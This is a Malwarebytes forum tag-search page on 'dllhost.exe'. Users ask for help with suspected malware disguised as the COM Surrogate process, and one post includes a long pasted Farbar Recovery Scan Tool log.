Jump to content

Search the Community

Showing results for tags 'dllhost.exe'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Announcements
    • Malwarebytes News
    • Beta Testing Program
  • Malware Removal Help
    • Windows Malware Removal Help & Support
    • Mac Malware Removal Help & Support
    • Mobile Malware Removal Help & Support
    • Malware Removal Self-Help Guides
  • Malwarebytes for Home Support
    • Malwarebytes for Windows Support Forum
    • Malwarebytes for Mac Support Forum
    • Malwarebytes for Android Support Forum
    • Malwarebytes for iOS Support
    • Malwarebytes Privacy
    • Malwarebytes Browser Guard
    • False Positives
    • Comments and Suggestions
  • Malwarebytes for Business Support
    • Malwarebytes Endpoint Protection
    • Malwarebytes Incident Response (includes Breach Remediation)
    • Malwarebytes Endpoint Security
    • Malwarebytes Business Products Comments and Suggestions
  • Malwarebytes Tools and Other Products
    • Malwarebytes AdwCleaner
    • Malwarebytes Junkware Removal Tool Support
    • Malwarebytes Anti-Rootkit BETA Support
    • Malwarebytes Techbench USB (Legacy)
    • Malwarebytes Secure Backup discontinued
    • Other Tools
    • Malwarebytes Tools Comments and Suggestions
  • General Computer Help and Security Updates
    • BSOD, Crashes, Kernel Debugging
    • General Windows PC Help
  • Research Center
    • Newest Rogue-Ransomware Threats
    • Newest Malware Threats
    • Newest Mobile Threats
    • Newest IP or URL Threats
    • Newest Mac Threats
    • Report Scam Phone Numbers
  • General
    • General Chat
    • Forums Announcements & Feedback

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Location


Interests

  1. About 2 weeks ago I downloaded Internet Download Manager patch from a suspicious site and after that I have been noticing COMSurrogate process taking up about 20% of CPU usage in task manager. I ran Malwarebyte and it detected 2 malware, one registry item called MSDLLHelper under HKU\S-1-5-21-2376670492-3024356693-3209832367-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|MSDllHelper and a program call DLLHost.exe under C:/User/danny/Appdata/Roaming/DLL/Dllhost.exe. I have since uninstalled Internet download manager and quarantined the malwares but every time I boot up my PC this 2 malware will show up again and I had to quarantine and delete them again. Is there any way to remove them for good and prevent them from spawning again? I understand I need to attach some logs and the fix scripts from other posts are user specific, please assist me with the process, thanks. Screenshot is attached below.
  2. Hello, Recently i've had my DLL = (Dllhost.exe *32 Surrogate) Behave Strangely, Though it was only one instance of DLL, It was eating up to 130,000KB (so i closed it). When looking at processes from all users in the taskmanager I can only spot 2 instances of DLL running one from "SERVICE" and the other from "LOCAL SERVICE" (Both running at around 500KB) Both file locations lead here "C:\Windows\SysWOW64\dllhost.exe" Is this normal behavior or might this be a virus?? Ps: Pardon my english.
  3. Hello, My computer seems to have a problem whenever i only open on my /F: folder (not /C:) to view some other folders inside the hdd. My computer began to slow down and RAM Memory is slowly increasing every second. From what i notice in the task manager, there's a process call dllhost.exe where its eating away all the ram and its description under COM Surrogate. To recover normally i have to restart every time when i open the F folder, and after that everything is okay, but ill never touch the /:F just to avoid it. I look around with Mr.Google and which quite confuse whether its a malware or link to the system32. Please help and thank you Look at the picture for more info... Using Windows 7 64 Bit, 16gb of RAM
  4. Are these duplicate files normal or a virus? I have the latest version of mbam premium and my threat scan results are zero. I also downloaded the Farbar recovery tool to my desktop and ran a scan. I have copied / pasted the content from FRST.txt below. Please advise. I'm thinking it's not normal to see these duplicate files in task manager. I can delete one but when I reboot, they call come back in multiples. Please advise -------------- Farbar's FRST.txt ----- Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 18-09-2016 Ran by GImagineG (administrator) on WWBFANBSWHTALAM (19-09-2016 22:30:16) Running from C:\Users\GImagineG\Desktop Loaded Profiles: GImagineG (Available Profiles: GImagineG) Platform: Windows 10 Home Version 1607 (X64) Language: English (United States) Internet Explorer Version 11 (Default browser: FF) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Intel Corporation) C:\Windows\System32\igfxCUIService.exe (SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe (Broadcom Corporation.) C:\Windows\System32\BtwRSupportService.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe (Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe (Károly Pados) C:\Program Files (x86)\TinyWall\TinyWall.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\100\DTS\Binn\MsDtsSrvr.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSRS10.MSSQLSERVER\Reporting Services\ReportServer\bin\ReportingServicesService.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\sqlservr.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSAS10.MSSQLSERVER\OLAP\bin\msmdsrv.exe (Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\fdhost.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Intel Corporation) C:\Windows\System32\igfxEM.exe (Intel Corporation) C:\Windows\System32\igfxHK.exe () C:\Windows\System32\igfxTray.exe (Károly Pados) C:\Program Files (x86)\TinyWall\TinyWall.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe (SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe () C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe (Microsoft Corporation) C:\Windows\System32\smartscreen.exe ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3933496 2012-09-20] (Logitech, Inc.) HKLM\...\Run: [TinyWall Controller] => C:\Program Files (x86)\TinyWall\TinyWall.exe [693080 2016-01-04] (Károly Pados) HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-15] (Microsoft Corporation) HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.) HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.) HKLM-x32\...\Run: [TkBellExe] => C:\Program Files (x86)\Real\RealPlayer\Update\realsched.exe [286992 2016-01-11] (RealNetworks, Inc.) HKLM-x32\...\Run: [RealDownloader] => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [719632 2015-11-04] () HKU\S-1-5-21-1554107894-1944105626-794477097-1001\...\Run: [LightScribe Control Panel] => C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe [455968 2007-08-23] (Hewlett-Packard Company) HKU\S-1-5-21-1554107894-1944105626-794477097-1001\...\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => C:\Program Files (x86)\Common Files\Ahead\Lib\NMBgMonitor.exe [152872 2007-06-27] (Nero AG) HKU\S-1-5-21-1554107894-1944105626-794477097-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8591272 2015-11-16] (Piriform Ltd) HKU\S-1-5-21-1554107894-1944105626-794477097-1001\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7943072 2016-08-31] (SUPERAntiSpyware) ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma Loader.lnk [2015-12-11] ShortcutTarget: Adobe Gamma Loader.lnk -> C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk [2016-02-21] ShortcutTarget: Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE (Microsoft Corporation) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RealTimes.lnk [2016-01-11] ShortcutTarget: RealTimes.lnk -> C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin\rpsystray.exe (RealNetworks, Inc.) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Tcpip\Parameters: [DhcpNameServer] 108.7.45.5 Tcpip\..\Interfaces\{0f755d79-3aa7-445a-9614-10e3e0e860bf}: [NameServer] 8.8.8.8,8.8.4.4 Tcpip\..\Interfaces\{0f755d79-3aa7-445a-9614-10e3e0e860bf}: [DhcpNameServer] 108.7.45.5 Internet Explorer: ================== HKU\S-1-5-21-1554107894-1944105626-794477097-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/p/?LinkId=619797&pc=UE03&ocid=UE03DHP BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll [2015-11-04] (RealDownloader) BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2015-11-04] (RealDownloader) BHO-x32: Microsoft Web Test Recorder 9.0 Helper -> {E31CE47F-C268-41ba-897B-B415E613947D} -> C:\Program Files (x86)\Microsoft Visual Studio 9.0\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.QualityTools.RecorderBarBHO90.dll [2007-11-08] (Microsoft Corporation) Handler-x32: http - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-02-03] (Microsoft Corporation) Handler-x32: http - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-02-03] (Microsoft Corporation) Handler-x32: https - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-02-03] (Microsoft Corporation) Handler-x32: https - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-02-03] (Microsoft Corporation) Handler-x32: ipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-02-03] (Microsoft Corporation) Handler-x32: msdaipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-02-03] (Microsoft Corporation) Handler-x32: msdaipp - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-02-03] (Microsoft Corporation) FireFox: ======== FF ProfilePath: C:\Users\GImagineG\AppData\Roaming\Mozilla\Firefox\Profiles\60esv6ob.default FF DefaultSearchEngine: Bing FF SearchEngineOrder.3: Bing FF SelectedSearchEngine: Bing FF Homepage: hxxps://www.google.com/ FF Keyword.URL: hxxp://www.bing.com/search?FORM=SL5HDF&PC=SL5H&q= FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_22_0_0_209.dll [2016-08-09] () FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50709.0\npctrl.dll [2016-07-11] ( Microsoft Corporation) FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN) FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_22_0_0_209.dll [2016-08-09] () FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50709.0\npctrl.dll [2016-07-11] ( Microsoft Corporation) FF Plugin-x32: @real.com/nppl3260;version=18.1.2.175 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nppl3260.dll [2016-01-11] (RealNetworks, Inc.) FF Plugin-x32: @real.com/nprpplugin;version=18.1.2.175 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll [2016-01-11] (RealPlayer) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-08-01] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-08-01] (Google Inc.) FF SearchPlugin: C:\Users\GImagineG\AppData\Roaming\Mozilla\Firefox\Profiles\60esv6ob.default\searchplugins\bing-.xml [2016-03-29] FF Extension: (Bing Search) - C:\Users\GImagineG\AppData\Roaming\Mozilla\Firefox\Profiles\60esv6ob.default\Extensions\bingsearch.full@microsoft.com.xpi [2016-03-29] FF Extension: (Firefox Hotfix) - C:\Users\GImagineG\AppData\Roaming\Mozilla\Firefox\Profiles\60esv6ob.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-09-12] Chrome: ======= CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=en-us CHR StartupUrls: Default -> "hxxps://www.google.com/" CHR DefaultSearchURL: Default -> hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms} CHR DefaultSearchKeyword: Default -> bing.com CHR Plugin: (Widevine Content Decryption Module) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\WidevineCDM\1.4.8.866\_platform_specific\win_x64\widevinecdmadapter.dll => No File CHR Plugin: (Shockwave Flash) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\PepperFlash\21.0.0.216\pepflashplayer.dll => No File CHR Profile: C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default [2016-09-19] CHR Extension: (Google Slides) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-12-10] CHR Extension: (Google Docs) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-12-10] CHR Extension: (Google Drive) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-10] CHR Extension: (YouTube) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-10] CHR Extension: (Google Search) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-10] CHR Extension: (Google Sheets) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-12-10] CHR Extension: (Google Docs Offline) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-17] CHR Extension: (Deluminate) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\iebboopaeangfpceklajfohhbpkkfiaa [2016-05-10] CHR Extension: (Chrome Web Store Payments) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-13] CHR Extension: (Gmail) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-10] CHR Extension: (Chrome Media Router) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-09-19] CHR Extension: (Abstract Blue) - C:\Users\GImagineG\AppData\Local\Google\Chrome\User Data\Default\Extensions\plnacehkknmafkjgkikclamogikoiaaa [2016-09-05] CHR HKU\S-1-5-21-1554107894-1944105626-794477097-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx ==================== Services (Whitelisted) ======================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-22] (SUPERAntiSpyware.com) R2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2251992 2015-03-27] (Broadcom Corporation.) R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [374360 2016-05-27] (Intel Corporation) R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [21184 2015-11-20] (Microsoft Corporation) R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes) R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes) R2 MsDtsServer100; C:\Program Files\Microsoft SQL Server\100\DTS\Binn\MsDtsSrvr.exe [220088 2012-06-15] (Microsoft Corporation) R3 MSSQLFDLauncher; C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe [34840 2008-07-10] (Microsoft Corporation) R2 MSSQLSERVER; C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\sqlservr.exe [57967032 2012-06-15] (Microsoft Corporation) R2 MSSQLServerOLAPService; C:\Program Files\Microsoft SQL Server\MSAS10.MSSQLSERVER\OLAP\bin\msmdsrv.exe [43774808 2010-09-17] (Microsoft Corporation) S4 msvsmon90; C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\Remote Debugger\x64\msvsmon.exe [4737024 2008-07-29] (Microsoft Corporation) S3 NMIndexingService; C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe [279848 2007-06-27] (Nero AG) S4 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [33088 2015-11-04] () S4 RealTimes Desktop Service; C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin\rpdsvc.exe [1095976 2016-01-11] (RealNetworks, Inc.) R2 ReportServer; C:\Program Files\Microsoft SQL Server\MSRS10.MSSQLSERVER\Reporting Services\ReportServer\bin\ReportingServicesService.exe [2094520 2012-06-15] (Microsoft Corporation) S3 SQLSERVERAGENT; C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE [439736 2012-06-15] (Microsoft Corporation) S4 Te.Service; C:\Program Files (x86)\Windows Kits\10\Testing\Runtimes\TAEF\Wex.Services.exe [137216 2015-11-19] (Microsoft Corporation) [File not signed] R2 TinyWall; C:\Program Files (x86)\TinyWall\TinyWall.exe [693080 2016-01-04] (Károly Pados) [File not signed] R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation) R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation) ===================== Drivers (Whitelisted) ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [173312 2015-03-27] (Broadcom Corporation.) R3 KillerEth; C:\Windows\System32\drivers\e22w10x64.sys [124464 2015-04-27] (Qualcomm Atheros, Inc.) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes) R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-09-19] (Malwarebytes) R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation) S3 NetAdapterCx; C:\Windows\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] () R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com) R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com) R3 SensorsSimulatorDriver; C:\Windows\System32\drivers\WUDFRd.sys [216064 2016-07-16] (Microsoft Corporation) S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation) R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation) R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation) U3 aspnet_state; no ImagePath ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-09-19 22:30 - 2016-09-19 22:30 - 00017610 _____ C:\Users\GImagineG\Desktop\FRST.txt 2016-09-19 22:30 - 2016-09-19 22:30 - 00000000 ____D C:\FRST 2016-09-19 22:15 - 2016-09-19 22:29 - 02400256 _____ (Farbar) C:\Users\GImagineG\Desktop\FRST64.exe 2016-09-19 21:22 - 2016-09-19 21:22 - 02400256 _____ (Farbar) C:\Users\GImagineG\Downloads\FRST64.exe 2016-09-19 21:19 - 2016-09-19 21:20 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\GImagineG\Downloads\rkill.exe 2016-09-19 15:20 - 2016-09-19 15:20 - 00000000 ____D C:\Users\GImagineG\AppData\Local\ZipScript 10 2016-09-19 14:27 - 2016-09-19 14:27 - 01130830 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI 2016-09-19 14:24 - 2016-05-25 14:31 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll 2016-09-19 14:24 - 2016-05-25 14:31 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll 2016-09-19 14:24 - 2016-05-25 14:31 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe 2016-09-19 14:24 - 2016-05-25 11:03 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll 2016-09-19 14:24 - 2016-05-25 11:03 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll 2016-09-19 14:24 - 2016-05-25 11:03 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe 2016-09-19 14:14 - 2016-09-19 14:15 - 00000000 ____D C:\sqlsv2k8 2016-09-15 05:03 - 2016-09-15 01:16 - 00000000 ___DC C:\WINDOWS\Panther 2016-09-15 05:02 - 2016-09-15 05:02 - 00000000 ____D C:\Windows.old 2016-09-15 05:01 - 2016-09-15 05:01 - 23681024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 22566400 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 22218808 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 20965248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 19417088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 17187840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 13867520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 13434368 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 13081088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 12345856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 12174336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 09260032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmploc.DLL 2016-09-15 05:01 - 2016-09-15 05:01 - 09260032 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmploc.DLL 2016-09-15 05:01 - 2016-09-15 05:01 - 09128448 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 08156592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 08122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 08075776 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 07813472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 07792640 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 07654912 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 07623680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 07468032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 07220224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 07219672 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 06653592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 06574592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanmm.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 06109184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 06043136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 05721808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 05684736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 05622600 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 05511680 _____ (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 05398016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aclui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 05384192 _____ (Microsoft) C:\WINDOWS\system32\dbgeng.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 05376000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll 2016-09-15 05:01 - 